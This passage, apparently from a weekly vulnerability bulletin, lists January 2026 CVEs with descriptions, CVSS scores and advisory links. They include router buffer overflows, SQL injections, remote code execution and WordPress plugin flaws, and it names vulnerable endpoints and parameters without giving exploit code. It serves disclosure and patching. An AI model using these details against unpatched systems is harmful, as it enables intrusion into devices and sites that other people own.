| Totolink--LR350 | A vulnerability was found in Totolink LR350 9.3.5u.6369_B20220309. Affected by this vulnerability is the function setWiFiEasyGuestCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ssid results in buffer overflow. The attack may be performed from remote. The exploit has been made public and could be used. | 2026-01-19 | 8.8 | CVE-2026-1155 | VDB-341749 \| Totolink LR350 cstecgi.cgi setWiFiEasyGuestCfg buffer overflow VDB-341749 \| CTI Indicators (IOB, IOC, IOA) Submit #735718 \| TOTOLINK LR350 LR350 V9.3.5u.6369_B20220309 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setWiFiEasyGuestCfg-2e453a41781f8034bae3d1a11066a8fb?source=copy_link https://www.totolink.net/ |
| Totolink--LR350 | A vulnerability was determined in Totolink LR350 9.3.5u.6369_B20220309. Affected by this issue is the function setWiFiBasicCfg of the file /cgi-bin/cstecgi.cgi. This manipulation of the argument ssid causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2026-01-19 | 8.8 | CVE-2026-1156 | VDB-341750 \| Totolink LR350 cstecgi.cgi setWiFiBasicCfg buffer overflow VDB-341750 \| CTI Indicators (IOB, IOC, IOA) Submit #735722 \| TOTOLINK LR350 LR350 V9.3.5u.6369_B20220309 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setWiFiBasicCfg-2e453a41781f80a2ad43e85bf5d46659?source=copy_link https://www.totolink.net/ |
| Totolink--LR350 | A vulnerability was identified in Totolink LR350 9.3.5u.6369_B20220309. This affects the function setWiFiEasyCfg of the file /cgi-bin/cstecgi.cgi. Such manipulation of the argument ssid leads to buffer overflow. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2026-01-19 | 8.8 | CVE-2026-1157 | VDB-341751 \| Totolink LR350 cstecgi.cgi setWiFiEasyCfg buffer overflow VDB-341751 \| CTI Indicators (IOB, IOC, IOA) Submit #735726 \| TOTOLINK LR350 LR350 V9.3.5u.6369_B20220309 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setWiFiEasyCfg-2e453a41781f80b7b53cef33c6a782aa?source=copy_link https://www.totolink.net/ |
| Totolink--LR350 | A security flaw has been discovered in Totolink LR350 9.3.5u.6369_B20220309. This vulnerability affects the function setWizardCfg of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. Performing a manipulation of the argument ssid results in buffer overflow. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-19 | 8.8 | CVE-2026-1158 | VDB-341752 \| Totolink LR350 POST Request cstecgi.cgi setWizardCfg buffer overflow VDB-341752 \| CTI Indicators (IOB, IOC, IOA) Submit #735728 \| TOTOLINK LR350 LR350 V9.3.5u.6369_B20220309 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setWizardCfg-2e453a41781f80ce89cfc1d25049e279?source=copy_link https://www.totolink.net/ |
| Totolink--NR1800X | A vulnerability was detected in Totolink NR1800X 9.1.0u.6279_B20210910. Impacted is the function setWizardCfg of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. Performing a manipulation of the argument ssid results in buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used. | 2026-01-22 | 8.8 | CVE-2026-1328 | VDB-342304 \| Totolink NR1800X POST Request cstecgi.cgi setWizardCfg buffer overflow VDB-342304 \| CTI Indicators (IOB, IOC, IOA) Submit #735792 \| TOTOLINK NR1800X NR1800X_Firmware V9.1.0u.6279_B20210910 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-NR1800X-setWizardCfg-2e453a41781f80568a54c9368082fbe9?source=copy_link https://www.totolink.net/ |
| Unified Intents AB--Unified Remote | Unified Remote 3.9.0.2463 contains a remote code execution vulnerability that allows attackers to send crafted network packets to execute arbitrary commands. Attackers can exploit the service by connecting to port 9512 and sending specially crafted packets to open a command prompt and download and execute malicious payloads. | 2026-01-23 | 9.8 | CVE-2021-47891 | ExploitDB-49587 Unified Remote Official Homepage Unified Remote Download Page VulnCheck Advisory: Unified Remote 3.9.0.2463 - Remote Code Execution |
| UTT-- 520W | A vulnerability was detected in UTT 进取 520W 1.7.7-180627. Affected by this issue is the function strcpy of the file /goform/formWebAuthGlobalConfig. Performing a manipulation results in buffer overflow. The attack can be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 8.8 | CVE-2026-1137 | VDB-341728 \| UTT 进取 520W formWebAuthGlobalConfig strcpy buffer overflow VDB-341728 \| CTI Indicators (IOB, IOC, IOA) Submit #735296 \| UTT 进取 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/32.md |
| UTT-- 520W | A flaw has been found in UTT 进取 520W 1.7.7-180627. This affects the function strcpy of the file /goform/ConfigExceptQQ. Executing a manipulation can lead to buffer overflow. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 8.8 | CVE-2026-1138 | VDB-341729 \| UTT 进取 520W ConfigExceptQQ strcpy buffer overflow VDB-341729 \| CTI Indicators (IOB, IOC, IOA) Submit #735298 \| UTT 进取 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/33.md |
| UTT-- 520W | A vulnerability has been found in UTT 进取 520W 1.7.7-180627. This vulnerability affects the function strcpy of the file /goform/ConfigExceptMSN. The manipulation leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 8.8 | CVE-2026-1139 | VDB-341730 \| UTT 进取 520W ConfigExceptMSN strcpy buffer overflow VDB-341730 \| CTI Indicators (IOB, IOC, IOA) Submit #735299 \| UTT 进取 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/34.md |
| UTT-- 520W | A vulnerability was found in UTT 进取 520W 1.7.7-180627. This issue affects the function strcpy of the file /goform/ConfigExceptAli. The manipulation results in buffer overflow. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 8.8 | CVE-2026-1140 | VDB-341731 \| UTT 进取 520W ConfigExceptAli strcpy buffer overflow VDB-341731 \| CTI Indicators (IOB, IOC, IOA) Submit #735300 \| UTT 进取 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/35.md |
| UTT--HiPER 810 | A flaw has been found in UTT HiPER 810 1.7.4-141218. The impacted element is the function strcpy of the file /goform/setSysAdm. This manipulation of the argument passwd1 causes buffer overflow. Remote exploitation is possible. The exploit has been published and may be used. | 2026-01-19 | 9.8 | CVE-2026-1162 | VDB-341756 \| UTT HiPER 810 setSysAdm strcpy buffer overflow VDB-341756 \| CTI Indicators (IOB, IOC, IOA) Submit #736511 \| UTT HiPER 810 / nv810v4 nv810v4v1.7.4-141218 Buffer Overflow https://github.com/cha0yang1/UTT810/blob/main/1.md https://github.com/cha0yang1/UTT810/blob/main/1.md#poc |
| VestaCP--VestaCP | VestaCP versions prior to 0.9.8-25 contain a cross-site scripting vulnerability in the IP interface configuration that allows attackers to inject malicious scripts. Attackers can exploit the 'v_interface' parameter by sending a crafted POST request to the add/ip/ endpoint with a stored XSS payload. | 2026-01-21 | 7.2 | CVE-2021-47873 | ExploitDB-49662 VestaCP Official Vendor Homepage VestaCP Alternative Download Site VulnCheck Advisory: VestaCP < 0.9.8-25 - Stored Cross-Site Scripting |
| Vfsforgit--VFS for Git | VFS for Git 1.0.21014.1 contains an unquoted service path vulnerability in the GVFS.Service Windows service that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem privileges during service startup or system reboot. | 2026-01-21 | 7.8 | CVE-2021-47874 | ExploitDB-49661 Vendor Homepage VulnCheck Advisory: VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). Starting in version 0.10.1 and prior to version 0.14.0, vLLM loads Hugging Face `auto_map` dynamic modules during model resolution without gating on `trust_remote_code`, allowing attacker-controlled Python code in a model repo/path to execute at server startup. An attacker who can influence the model repo/path (local directory or remote Hugging Face repo) can achieve arbitrary code execution on the vLLM host during model load. This happens before any request handling and does not require API access. Version 0.14.0 fixes the issue. | 2026-01-21 | 8.8 | CVE-2026-22807 | https://github.com/vllm-project/vllm/security/advisories/GHSA-2pc9-4j83-qjmr https://github.com/vllm-project/vllm/pull/32194 https://github.com/vllm-project/vllm/commit/78d13ea9de4b1ce5e4d8a5af9738fea71fb024e5 https://github.com/vllm-project/vllm/releases/tag/v0.14.0 |
| wpdevteam--NotificationX FOMO, Live Sales Notification, WooCommerce Sales Popup, GDPR, Social Proof, Announcement Banner & Floating Notification Bar | The NotificationX - FOMO, Live Sales Notification, WooCommerce Sales Popup, GDPR, Social Proof, Announcement Banner & Floating Notification Bar plugin for WordPress is vulnerable to DOM-Based Cross-Site Scripting via the 'nx-preview' POST parameter in all versions up to, and including, 3.2.0. This is due to insufficient input sanitization and output escaping when processing preview data. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute when a user visits a malicious page that auto-submits a form to the vulnerable site. | 2026-01-20 | 7.2 | CVE-2025-15380 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9ca12315-380b-4251-b637-4e9d29df35e0?source=cve https://research.cleantalk.org/cve-2025-15380/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3433555%40notificationx&old=3426659%40notificationx&sfp_email=&sfph_mail= |
| wpmessiah--Frontis Blocks Block Library for the Block Editor | The Frontis Blocks plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.1.6. This is due to insufficient restriction on the 'url' parameter in the 'template_proxy' function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application via the '/template-proxy/' and '/proxy-image/' endpoint. | 2026-01-24 | 7.2 | CVE-2026-0807 | https://www.wordfence.com/threat-intel/vulnerabilities/id/322e0a27-9119-4b46-a043-d3a68c4fcdc4?source=cve https://plugins.trac.wordpress.org/browser/frontis-blocks/trunk/includes/Admin/Admin.php#L910 https://plugins.trac.wordpress.org/browser/frontis-blocks/tags/1.1.4/includes/Admin/Admin.php#L910 https://plugins.trac.wordpress.org/changeset/3444616/ |
| wpmudev--Hustle Email Marketing, Lead Generation, Optins, Popups | The Hustle - Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the action_import_module() function in all versions up to, and including, 7.8.9.2. This makes it possible for authenticated attackers, with a lower-privileged role (e.g., Subscriber-level access and above), to upload arbitrary files on the affected site's server which may make remote code execution possible. Successful exploitation requires an admin to grant Hustle module permissions (or module edit access) to the low-privileged user so they can access the Hustle admin page and obtain the required nonce. | 2026-01-24 | 7.5 | CVE-2026-0911 | https://www.wordfence.com/threat-intel/vulnerabilities/id/22be5fb5-143e-4934-9f93-e17def18e883?source=cve https://plugins.trac.wordpress.org/changeset/3440956/wordpress-popup |
| Yodinfo--Mini Mouse | Mini Mouse 9.2.0 contains a remote code execution vulnerability that allows attackers to execute arbitrary commands through an unauthenticated HTTP endpoint. Attackers can leverage the /op=command endpoint to download and execute payloads by sending crafted JSON requests with malicious script commands. | 2026-01-21 | 9.8 | CVE-2021-47851 | ExploitDB-49743 Mini Mouse Apple Store VulnCheck Advisory: Mini Mouse 9.2.0 - Remote Code Execution |
| Yodinfo--Mini Mouse | Mini Mouse 9.2.0 contains a path traversal vulnerability that allows remote attackers to access arbitrary system files and directories through crafted HTTP requests. Attackers can retrieve sensitive files like win.ini and list contents of system directories such as C:\Users\Public by manipulating file and path parameters. | 2026-01-21 | 7.5 | CVE-2021-47850 | ExploitDB-49744 Mini Mouse Apple Store VulnCheck Advisory: Mini Mouse 9.2.0 - Path Traversal |
| Yonyou--KSOA | A vulnerability was detected in Yonyou KSOA 9.0. This vulnerability affects unknown code of the file /worksheet/worksadd.jsp of the component HTTP GET Parameter Handler. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1129 | VDB-341719 \| Yonyou KSOA HTTP GET Parameter worksadd.jsp sql injection VDB-341719 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734557 \| Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/11 |
| Yonyou--KSOA | A flaw has been found in Yonyou KSOA 9.0. This issue affects some unknown processing of the file /worksheet/worksadd_plan.jsp of the component HTTP GET Parameter Handler. This manipulation of the argument ID causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1130 | VDB-341720 \| Yonyou KSOA HTTP GET Parameter worksadd_plan.jsp sql injection VDB-341720 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734565 \| Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/12 |
| Yonyou--KSOA | A vulnerability has been found in Yonyou KSOA 9.0. Impacted is an unknown function of the file /kmc/save_catalog.jsp of the component HTTP GET Parameter Handler. Such manipulation of the argument catalogid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1131 | VDB-341721 \| Yonyou KSOA HTTP GET Parameter save_catalog.jsp sql injection VDB-341721 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734566 \| Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/13 |
| Yonyou--KSOA | A vulnerability was found in Yonyou KSOA 9.0. The affected element is an unknown function of the file /kmf/edit_folder.jsp of the component HTTP GET Parameter Handler. Performing a manipulation of the argument folderid results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1132 | VDB-341722 \| Yonyou KSOA HTTP GET Parameter edit_folder.jsp sql injection VDB-341722 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734568 \| Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/15 |
| Yonyou--KSOA | A vulnerability was determined in Yonyou KSOA 9.0. The impacted element is an unknown function of the file /kmf/folder.jsp of the component HTTP GET Parameter Handler. Executing a manipulation of the argument folderid can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1133 | VDB-341723 \| Yonyou KSOA HTTP GET Parameter folder.jsp sql injection VDB-341723 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734576 \| Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/16 |
| Yonyou--KSOA | A weakness has been identified in Yonyou KSOA 9.0. Affected by this vulnerability is an unknown functionality of the file /kmf/save_folder.jsp of the component HTTP GET Parameter Handler. Executing a manipulation of the argument folderid can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1177 | VDB-341771 \| Yonyou KSOA HTTP GET Parameter save_folder.jsp sql injection VDB-341771 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734577 \| Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/17 |
| Yonyou--KSOA | A security vulnerability has been detected in Yonyou KSOA 9.0. Affected by this issue is some unknown functionality of the file /kmf/select.jsp of the component HTTP GET Parameter Handler. The manipulation of the argument folderid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1178 | VDB-341772 \| Yonyou KSOA HTTP GET Parameter select.jsp sql injection VDB-341772 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734593 \| Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/18 |
| Yonyou--KSOA | A vulnerability was detected in Yonyou KSOA 9.0. This affects an unknown part of the file /kmf/user_popedom.jsp of the component HTTP GET Parameter Handler. The manipulation of the argument folderid results in sql injection. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1179 | VDB-341773 \| Yonyou KSOA HTTP GET Parameter user_popedom.jsp sql injection VDB-341773 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734594 \| Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/19 |
| Zoom Communications Inc.--Zoom Node | A Command Injection vulnerability in Zoom Node Multimedia Routers (MMRs) before version 5.2.1716.0 may allow a meeting participant to conduct remote code execution of the MMR via network access. | 2026-01-20 | 9.9 | CVE-2026-22844 | https://www.zoom.com/en/trust/security-bulletin/zsb-26001 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 10web--Photo Gallery by 10Web Mobile-Friendly Image Gallery | The Photo Gallery by 10Web - Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_comment() function in all versions up to, and including, 1.8.36. This makes it possible for unauthenticated attackers to delete arbitrary image comments. Note: comments functionality is only available in the Pro version of the plugin. | 2026-01-21 | 5.3 | CVE-2026-1036 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4eb2ae42-584d-4da8-9184-461b5a37b7b6?source=cve https://plugins.trac.wordpress.org/browser/photo-gallery/tags/1.8.35/frontend/controllers/BWGControllerGalleryBox.php#L173 |
| adzbierajewski--Alex User Counter | The Alex User Counter plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.0. This is due to missing nonce validation on the alex_user_counter_function() function. This makes it possible for unauthenticated attackers to update the plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2026-1070 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1a5ef5b3-2900-44f0-9e13-66fbdc937b38?source=cve https://plugins.trac.wordpress.org/browser/user-counter/trunk/user-counter.php#L41 https://plugins.trac.wordpress.org/browser/user-counter/tags/6.0/user-counter.php#L41 |
| Aida Computer Information Technology Inc.--Hotel Guest Hotspot | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Aida Computer Information Technology Inc. Hotel Guest Hotspot allows Reflected XSS. This issue affects Hotel Guest Hotspot: through 22012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-22 | 5.5 | CVE-2025-4763 | https://www.usom.gov.tr/bildirim/tr-26-0001 |
| aiktp--AIKTP | The AIKTP plugin for WordPress is vulnerable to unauthorized modification of data due to missing authorization checks on the /aiktp/getToken REST API endpoint in all versions up to, and including, 5.0.04. The endpoint uses the 'verify_user_logged_in' as a permission callback, which only checks if a user is logged in, but fails to verify if the user has administrative capabilities. This makes it possible for authenticated attackers with Subscriber-level access and above to retrieve the administrator's 'aiktpz_token' access token, which can then be used to create posts, upload media library files, and access private content as the administrator. | 2026-01-24 | 5.4 | CVE-2026-1103 | https://www.wordfence.com/threat-intel/vulnerabilities/id/84846d95-792d-4569-b0eb-876d82d0beee?source=cve https://plugins.trac.wordpress.org/browser/aiktp/tags/5.0.04/includes/aiktp-sync.php#L123 https://plugins.trac.wordpress.org/browser/aiktp/tags/5.0.04/includes/aiktp-sync.php#L143 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3445248%40aiktp&new=3445248%40aiktp |
| AlchemyCMS--alchemy_cms | Alchemy is an open source content management system engine written in Ruby on Rails. Prior to versions 7.4.12 and 8.0.3, the application uses the Ruby `eval()` function to dynamically execute a string provided by the `resource_handler.engine_name` attribute in `Alchemy::ResourcesHelper#resource_url_proxy`. The vulnerability exists in `app/helpers/alchemy/resources_helper.rb` at line 28. The code explicitly bypasses security linting with `# rubocop:disable Security/Eval`, indicating that the use of a dangerous function was known but not properly mitigated. Since `engine_name` is sourced from module definitions that can be influenced by administrative configurations, it allows an authenticated attacker to escape the Ruby sandbox and execute arbitrary system commands on the host OS. Versions 7.4.12 and 8.0.3 fix the issue by replacing `eval()` with `send()`. | 2026-01-19 | 6.4 | CVE-2026-23885 | https://github.com/AlchemyCMS/alchemy_cms/security/advisories/GHSA-2762-657x-v979 https://github.com/AlchemyCMS/alchemy_cms/commit/55d03ec600fd9e07faae1138b923790028917d26 https://github.com/AlchemyCMS/alchemy_cms/commit/563c4ce45bf5813b7823bf3403ca1fc32cb769e7 https://github.com/AlchemyCMS/alchemy_cms/releases/tag/v7.4.12 https://github.com/AlchemyCMS/alchemy_cms/releases/tag/v8.0.3 |
| Altium--AES | A stored cross-site scripting (XSS) vulnerability in the BOM Viewer in Altium AES 7.0.3 allows an authenticated attacker to inject arbitrary JavaScript into the Description field of a schematic, which is executed when the BOM Viewer renders the affected content. | 2026-01-22 | 6.8 | CVE-2025-27379 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Designer | Altium Designer version 24.9.0 does not validate self-signed server certificates for cloud connections. An attacker capable of performing a man-in-the-middle (MITM) attack could exploit this issue to intercept or manipulate network traffic, potentially exposing authentication credentials or sensitive design data. | 2026-01-22 | 5.3 | CVE-2025-27377 | https://www.altium.com/platform/security-compliance/security-advisories |
| aminhashemy--GZSEO | The GZSEO plugin for WordPress is vulnerable to authorization bypass leading to Stored Cross-Site Scripting in all versions up to, and including, 2.0.11. This is due to missing capability checks on multiple AJAX handlers combined with insufficient input sanitization and output escaping on the embed_code parameter. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary content into any post on the site that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2025-14941 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c91a4d4d-5bfa-42fd-80b4-7a75ee79db19?source=cve https://plugins.trac.wordpress.org/browser/gzseo/tags/2.0.11/includes/class-gzseo-video-update.php?marks=112,365,369,370,563#L112 |
| andddd--WP-ClanWars | The WP-ClanWars plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 2.0.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-24 | 4.9 | CVE-2026-0806 | https://www.wordfence.com/threat-intel/vulnerabilities/id/65aa20e2-efc1-481a-8ed4-423d2420c3db?source=cve https://plugins.trac.wordpress.org/browser/wp-clanwars/trunk/classes/teams.class.php#L92 https://plugins.trac.wordpress.org/browser/wp-clanwars/tags/2.0.1/classes/teams.class.php#L92 https://cwe.mitre.org/data/definitions/89.html |
| AutomationDirect--CLICK Programmable Logic Controller | An attacker could decrypt sensitive data, impersonate legitimate users or devices, and potentially gain access to network resources for lateral attacks. | 2026-01-22 | 6.1 | CVE-2025-25051 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-02 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-022-02.json |
| AutomationDirect--CLICK Programmable Logic Controller | An attacker with access to the project file could use the exposed credentials to impersonate users, escalate privileges, or gain unauthorized access to systems and services. The absence of robust encryption or secure handling mechanisms increases the likelihood of this type of exploitation, leaving sensitive information more vulnerable. | 2026-01-22 | 6.1 | CVE-2025-67652 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-02 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-022-02.json |
| avahi--avahi | Avahi is a system which facilitates service discovery on a local network via the mDNS/DNS-SD protocol suite. In versions 0.9rc2 and below, avahi-daemon can be crashed via a segmentation fault by sending an unsolicited mDNS response containing a recursive CNAME record, where the alias and canonical name point to the same domain (e.g., "h.local" as a CNAME for "h.local"). This causes unbounded recursion in the lookup_handle_cname function, leading to stack exhaustion. The vulnerability affects record browsers where AVAHI_LOOKUP_USE_MULTICAST is set explicitly, which includes record browsers created by resolvers used by nss-mdns. This issue is patched in commit 78eab31128479f06e30beb8c1cbf99dd921e2524. | 2026-01-24 | 6.5 | CVE-2026-24401 | https://github.com/avahi/avahi/security/advisories/GHSA-h4vp-5m8j-f6w3 https://github.com/avahi/avahi/issues/501 https://github.com/avahi/avahi/commit/78eab31128479f06e30beb8c1cbf99dd921e2524 |
| AWS--Firecracker | A UNIX symbolic link following issue in the jailer component in Firecracker version v1.13.1 and earlier and 1.14.0 on Linux may allow a local host user with write access to the pre-created jailer directories to overwrite arbitrary host files via a symlink attack during the initialization copy at jailer startup, if the jailer is executed with root privileges. To mitigate this issue, users should upgrade to version v1.13.2 or 1.14.1 or above. | 2026-01-23 | 6 | CVE-2026-1386 | https://aws.amazon.com/security/security-bulletins/2026-003-AWS/ https://github.com/firecracker-microvm/firecracker/releases/tag/v1.14.1 https://github.com/firecracker-microvm/firecracker/releases/tag/v1.13.2 https://github.com/firecracker-microvm/firecracker/security/advisories/GHSA-36j2-f825-qvgc |
| axllent--mailpit | Mailpit is an email testing tool and API for developers. Versions prior to 1.28.3 are vulnerable to Server-Side Request Forgery (SSRF) via HTML Check CSS Download. The HTML Check feature (`/api/v1/message/{ID}/html-check`) is designed to analyze HTML emails for compatibility. During this process, the `inlineRemoteCSS()` function automatically downloads CSS files from external `<link rel="stylesheet" href="...">` tags to inline them for testing. Version 1.28.3 fixes the issue. | 2026-01-19 | 5.8 | CVE-2026-23845 | https://github.com/axllent/mailpit/security/advisories/GHSA-6jxm-fv7w-rw5j https://github.com/axllent/mailpit/commit/1679a0aba592ebc8487a996d37fea8318c984dfe https://github.com/axllent/mailpit/releases/tag/v1.28.3 |
| B&R Industrial Automation GmbH--Automation Runtime | An Allocation of Resources Without Limits or Throttling vulnerability in the ANSL-Server component of B&R Automation Runtime versions prior to 6.5 and prior to R4.93 could be exploited by an unauthenticated attacker on the network to win a race condition, resulting in permanent denial-of-service (DoS) conditions on affected devices. | 2026-01-19 | 6.8 | CVE-2025-11044 | https://www.br-automation.com/fileadmin/SA25P005-26597bd0.pdf |
| backstage--backstage | Backstage is an open framework for building developer portals, and @backstage/cli-common provides config loading functionality used by the backend and command line interface of Backstage. Prior to version 0.1.17, the `resolveSafeChildPath` utility function in `@backstage/backend-plugin-api`, which is used to prevent path traversal attacks, failed to properly validate symlink chains and dangling symlinks. An attacker could bypass the path validation via symlink chains (creating `link1 → link2 → /outside` where intermediate symlinks eventually resolve outside the allowed directory) and dangling symlinks (creating symlinks pointing to non-existent paths outside the base directory, which would later be created during file operations). This function is used by Scaffolder actions and other backend components to ensure file operations stay within designated directories. This vulnerability is fixed in `@backstage/backend-plugin-api` version 0.1.17. Users should upgrade to this version or later. Some workarounds are available. Run Backstage in a containerized environment with limited filesystem access and/or restrict template creation to trusted users. | 2026-01-21 | 6.3 | CVE-2026-24047 | https://github.com/backstage/backstage/security/advisories/GHSA-2p49-45hj-7mc9 https://github.com/backstage/backstage/commit/ae4dd5d1572a4f639e1a466fd982656b50f8e692 |
| Beckhoff Automation--TwinCAT.HMI.Server | On an instance of TwinCAT 3 HMI Server running on a device an authenticated administrator can inject arbitrary content into the custom CSS field which is persisted on the device and later returned via the login page and error page. | 2026-01-20 | 5.5 | CVE-2025-41768 | https://certvde.com/de/advisories/VDE-2025-106 |
| birkir--prime | A vulnerability was detected in birkir prime up to 0.4.0.beta.0. This issue affects some unknown processing of the file /graphql of the component GraphQL API. Performing a manipulation results in information disclosure. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-19 | 5.3 | CVE-2026-1170 | VDB-341764 (birkir prime GraphQL API graphql information disclosure); VDB-341764 (CTI Indicators (IOB, IOC, TTP, IOA)); Submit #731100 (birkir prime <=0.4.0 Sensitive Information Disclosure); https://github.com/birkir/prime/issues/541 |
| birkir--prime | A flaw has been found in birkir prime up to 0.4.0.beta.0. Impacted is an unknown function of the file /graphql of the component GraphQL Field Handler. Executing a manipulation can lead to denial of service. The attack may be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-19 | 5.3 | CVE-2026-1171 | VDB-341765 (birkir prime GraphQL Field graphql denial of service); VDB-341765 (CTI Indicators (IOB, IOC, TTP, IOA)); Submit #731101 (birkir prime <=0.4.0 GraphQL Field Duplication Vulnerability); https://github.com/birkir/prime/issues/542 |
| birkir--prime | A vulnerability has been found in birkir prime up to 0.4.0.beta.0. The affected element is an unknown function of the file /graphql of the component GraphQL Directive Handler. The manipulation leads to denial of service. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-19 | 5.3 | CVE-2026-1172 | VDB-341766 (birkir prime GraphQL Directive graphql denial of service); VDB-341766 (CTI Indicators (IOB, IOC, TTP, IOA)); Submit #731103 (birkir prime <=0.4.0 Graphql Directive Overloading Vulnerability); https://github.com/birkir/prime/issues/543 |
